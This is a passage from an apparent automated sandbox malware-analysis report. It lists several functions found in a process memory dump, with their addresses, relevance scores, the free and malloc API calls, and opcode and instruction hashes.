                                                                                                                                                                                                                                                                                                              • Instruction ID: 717193fd2d83c4fe8329ef4333b6127c6595d55cb9494107f21af48b1e53950e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0A710320D0D0FEA8C677E5CD972911C6EBCC262F91513BF41AC2282DA54CC5D0340
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0C994 Relevance: 1.5, APIs: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 91e17bb56da498b3e986dc3de11652cb3c779fdb5675f8bb1585adbc651fc4f5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73911171518B488BDB69EF15C8C96EEB3E1FFA4341F81892FE046C3151DB74964D8782
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0A7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3885a7af6f86ec9c3158417ecfbe461c252344ea01cbacfd1c31b3220edb8d51
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77416431214D0E9FDB88EF2DD88CA65B7E0FB68352B51466BE409C3654DB30E9898BC0
                                                                                                                                                                                                                                                                                                              Function 00000242C8C44C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1b7cb7818790c51f7074c4b354f5e8ba52905c832d311e89bce50c9e3ed8400f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F09670211D0A8FEF98DB6AC4D8F3A33D4FF98352FA56155A809C6195DB26CC85C740
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0A9D4 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                              • Instruction ID: c635562fe05ae8cbe1f07800863c8c271975077670d7d698e775c6c169a8d6c2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F01D70215E0E8FEB88EF5AC4D876473E4FB58346FA5417AD409C2590D7758C58CB41